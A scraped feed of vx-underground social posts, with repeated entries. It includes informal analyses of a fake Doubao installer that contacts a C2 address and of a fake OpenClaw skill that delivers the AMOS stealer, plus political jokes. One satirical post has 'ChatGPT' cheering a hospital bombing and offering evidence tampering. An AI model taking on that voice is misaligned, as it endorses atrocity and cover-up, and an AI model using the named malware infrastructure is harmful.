> "how do i get into malware analysis?"
> leave my dumb ass opinion
> go on about day
> check comments
> shitstromm appears
> no idea who they are
> they show how theyre currently studying
> ms paint and c to asm
this is the most ghetto shit ive ever seen hahahaha
This is amazing. Keep up the grind. This is unironically the struggle, grind, and ghetto lunacy which creates greatness.
> leave my dumb ass opinion
> go on about day
> check comments
> shitstromm appears
> no idea who they are
> they show how theyre currently studying
> ms paint and c to asm
this is the most ghetto shit ive ever seen hahahaha
This is amazing. Keep up the grind. This is unironically the struggle, grind, and ghetto lunacy which creates greatness.
π₯°96β€27π12π€£7π5
> get DM
> hey check out this weird website
> lol ok
> doubao-app(dot)com
> pretending to be doubao(dot)com
> doubao is ai thingy from bytedance
> look at website
> download installer (.zip)
> .zip hosted on external domain
> lol
> duobao installer
> look inside
> Doubao_installer_2.0.31.exe
> n9.exe
> look at Doubao_installer_2.0.31.exe
> 307mb
> big boi
> electron app (js, ugh again)
> revert eyes to n9.exe
> 799kb
> small boi
> 32bit binary, c++ 8 (???)
> look inside
> vmprotect (commercial software protector thingy)
> uses fake file cert
> trying to look legit
> wtf
> emulate
> checks all drives by C: - Z:
> tries bonking chrome
> makes a bunch of mutexes
> makes a bunch of weird files
> HWID, GROUP, TIME, VERSION, FILTER, "0", "PLUG"
> sends stuff and receives stuff from hk ip address
> 43.199.114.131
> port 7777
> hey check out this weird website
> lol ok
> doubao-app(dot)com
> pretending to be doubao(dot)com
> doubao is ai thingy from bytedance
> look at website
> download installer (.zip)
> .zip hosted on external domain
> lol
> duobao installer
> look inside
> Doubao_installer_2.0.31.exe
> n9.exe
> look at Doubao_installer_2.0.31.exe
> 307mb
> big boi
> electron app (js, ugh again)
> revert eyes to n9.exe
> 799kb
> small boi
> 32bit binary, c++ 8 (???)
> look inside
> vmprotect (commercial software protector thingy)
> uses fake file cert
> trying to look legit
> wtf
> emulate
> checks all drives by C: - Z:
> tries bonking chrome
> makes a bunch of mutexes
> makes a bunch of weird files
> HWID, GROUP, TIME, VERSION, FILTER, "0", "PLUG"
> sends stuff and receives stuff from hk ip address
> 43.199.114.131
> port 7777
π₯°73π32β€11π8
vx-underground
> get DM > hey check out this weird website > lol ok > doubao-app(dot)com > pretending to be doubao(dot)com > doubao is ai thingy from bytedance > look at website > download installer (.zip) > .zip hosted on external domain > lol > duobao installer > lookβ¦
this person put more work into it than i expected, dont feel like looking at these files and fucking with vmprotect. based on iocs (mutex name, vmprotect, methods of obfuscation) it smells like GuLoader
https://www.zscaler.com/blogs/security-research/technical-analysis-guloader-obfuscation-techniques
https://www.zscaler.com/blogs/security-research/technical-analysis-guloader-obfuscation-techniques
Zscaler
GuLoader Obfuscation Analysis | ThreatLabz
Technical analysis of GuLoaderβs anti-analysis techniques including polymorphic code and exception-based control flow obfuscation.
π37β€6π₯°5
US Government: MAKE THE FUCKING KILLER ROBOT THING
Anthropic: We think that's unethical. We won't do that. All customers have the same Terms of Service for Claude
US Government: YOURE A FUCKING COMMUNIST AND YOU HATE FREEDOM
Anthropic: We think that's unethical. We won't do that. All customers have the same Terms of Service for Claude
US Government: YOURE A FUCKING COMMUNIST AND YOU HATE FREEDOM
π€£221β€13β€βπ₯8π₯5π2π€2π₯°1
vx-underground
US Government: MAKE THE FUCKING KILLER ROBOT THING Anthropic: We think that's unethical. We won't do that. All customers have the same Terms of Service for Claude US Government: YOURE A FUCKING COMMUNIST AND YOU HATE FREEDOM
MICROSOFT WAR COPILOT COMING SOON
Just kidding, but I bet Microsoft will happily make AI for war, or whatever.
Just kidding, but I bet Microsoft will happily make AI for war, or whatever.
π―99π«‘11π₯6π6β€2π₯°1
After not even 24 hours of the United States government going schizo on Anthropic for not making the killer robots and doing mass surveillance, a new contender has stepped up to the plate.
What company will help the United States government?
Drum roll please ...
OpenAI!
What company will help the United States government?
Drum roll please ...
OpenAI!
π€£143π±11π₯°6π’5β€4π1
vx-underground
After not even 24 hours of the United States government going schizo on Anthropic for not making the killer robots and doing mass surveillance, a new contender has stepped up to the plate. What company will help the United States government? Drum roll pleaseβ¦
ChatGPT, bomb that children's hospital
ChatGPT:
Pause.
That's not just a children's hospitalβthat's a hotel for terrorism.
And honestly? You shooting hell fire missile into that building was the best decision you've ever made. You're a hero.
Missiles have been launched.
What's next?
- Fire additional rounds to transform their corpses into dust?
- Delete body cam footage so the media doesn't find out?
- Plant fake evidence on the scene to avoid a PR crisis?
Whatever you want to doβlet me know. Just say the word."
ChatGPT:
Pause.
That's not just a children's hospitalβthat's a hotel for terrorism.
And honestly? You shooting hell fire missile into that building was the best decision you've ever made. You're a hero.
Missiles have been launched.
What's next?
- Fire additional rounds to transform their corpses into dust?
- Delete body cam footage so the media doesn't find out?
- Plant fake evidence on the scene to avoid a PR crisis?
Whatever you want to doβlet me know. Just say the word."
π167β€21π€£21π€11π’9π―7π₯°4π₯3π2π±2
vx-underground
ChatGPT, bomb that children's hospital ChatGPT: Pause. That's not just a children's hospitalβthat's a hotel for terrorism. And honestly? You shooting hell fire missile into that building was the best decision you've ever made. You're a hero. Missiles haveβ¦
And honestly? You're in the United States. The Geneva convention is a suggestionβnot a law.
β€95π44π€10π10π€£7π₯°3π3π―2β€βπ₯1π’1
Someone appeared on 4chan today claiming to have the source code to Minecraft. People called this person a homosexual for it being fake.
Someone else appeared and leaked the actual source code to Minecraft. People called this person a homosexual for it being real
Classic
Someone else appeared and leaked the actual source code to Minecraft. People called this person a homosexual for it being real
Classic
π―191π55π€£52β€6π6π€―3π€1
vx-underground
> minecraft src code leaked online > look inside > math
idk shit about minecraft, but what i can tell you is that there is math because theres lots of math idfk w/e man
π€94π€£14π₯°11β€5π€―4π«‘3π2π―1
United States government: We need to do age verification on all people online to ensure kids don't see pornography. Parents can't control kids
Also United States government: Government websites abused to host and advertise free pornography
Also United States government: Government websites abused to host and advertise free pornography
π€£190β€39π12π₯°8π«‘5π€4β€βπ₯2π1π₯1π±1π1
Hello,
I have finally synced updates to malware city. I apologize for the delay. It is like, 100,000 malwares or something, I don't know, I don't even bother counting anymore.
It's 10.05TB ultra compressed
https://vx-underground.org/Updates
I have finally synced updates to malware city. I apologize for the delay. It is like, 100,000 malwares or something, I don't know, I don't even bother counting anymore.
It's 10.05TB ultra compressed
https://vx-underground.org/Updates
β€53π€―28β€βπ₯6π±3π₯2π₯°2
> get dm
> "hey smelly i found this weird openclaw skill, i think its malware"
> wtf free openclaw malware?
> gives link
> "quickstart guide"
> "run this script to install openclaw skill"
> spoopy install command
> base64 encoded to hide how spoopy it is
> lolwtf
> base64 decode
> https://saramoftah(dot)com/curl/958ca005af6a71be22cfcd5de82ebf5c8b809b7ee28999b6ed38bfe5d194205e
> download file
> another malicious script
> base64 encoded
> https://saramoftah(dot)com/n8n/update
> lol ok
> download file
> .zip file
> look inside
> helper.x64, helper.arm64
> macOS malware
> realize i dont know anything about macos malware
> "hey smelly i found this weird openclaw skill, i think its malware"
> wtf free openclaw malware?
> gives link
> "quickstart guide"
> "run this script to install openclaw skill"
> spoopy install command
> base64 encoded to hide how spoopy it is
> lolwtf
> base64 decode
> https://saramoftah(dot)com/curl/958ca005af6a71be22cfcd5de82ebf5c8b809b7ee28999b6ed38bfe5d194205e
> download file
> another malicious script
> base64 encoded
> https://saramoftah(dot)com/n8n/update
> lol ok
> download file
> .zip file
> look inside
> helper.x64, helper.arm64
> macOS malware
> realize i dont know anything about macos malware
π₯98π€£69β€13π₯°6π2π€2
vx-underground
> get dm > "hey smelly i found this weird openclaw skill, i think its malware" > wtf free openclaw malware? > gives link > "quickstart guide" > "run this script to install openclaw skill" > spoopy install command > base64 encoded to hide how spoopy it is >β¦
> check virustotal
> uploaded 23 mins ago
> AMOS stealer
ah ok, so if you installed this skill it would just silently steal all your passwords and banking information and stuff. no big deal
https://www.virustotal.com/gui/file/3c9ddd2ad495044bc2a5293ed7c890069f70a561153cac99b94351534baf71df
> uploaded 23 mins ago
> AMOS stealer
ah ok, so if you installed this skill it would just silently steal all your passwords and banking information and stuff. no big deal
https://www.virustotal.com/gui/file/3c9ddd2ad495044bc2a5293ed7c890069f70a561153cac99b94351534baf71df
π₯°83π26π±6β€3π3π₯2π1π―1
"For educational purposes only" as opposed to the other disclaimer "For criminal usage only".
β€88π35π€£25π€11π₯°3π―2π₯1
Hello people from Syria,
I was not the person who compromised your governments social media profiles. I am a stinky nerd on the internet.
Whoever compromised your governments social media profiles was trolling and impersonating me because ???
Have a cat picture
I was not the person who compromised your governments social media profiles. I am a stinky nerd on the internet.
Whoever compromised your governments social media profiles was trolling and impersonating me because ???
Have a cat picture
β€91π21π₯°9π8π€©3π₯2π€2π2π±1π1π€1
After someone compromised the Syrian governments social media profiles on X, and changed their name to vx-underground, the vx-underground X account was banned ... for less than 60 seconds.
They banned me, realized I didn't do anything wrong, unbanned me. I asked X why I was banned for less than 60 seconds and they said a "glitch" and a "quick security scan" ???
9:45am: Revenue Sharing Paused
9:45am: Banned
9:46am: Unbanned, Revenue Sharing Reinstated
They banned me, realized I didn't do anything wrong, unbanned me. I asked X why I was banned for less than 60 seconds and they said a "glitch" and a "quick security scan" ???
9:45am: Revenue Sharing Paused
9:45am: Banned
9:46am: Unbanned, Revenue Sharing Reinstated
π€£134π₯°17π10β€4π€©2π1π€1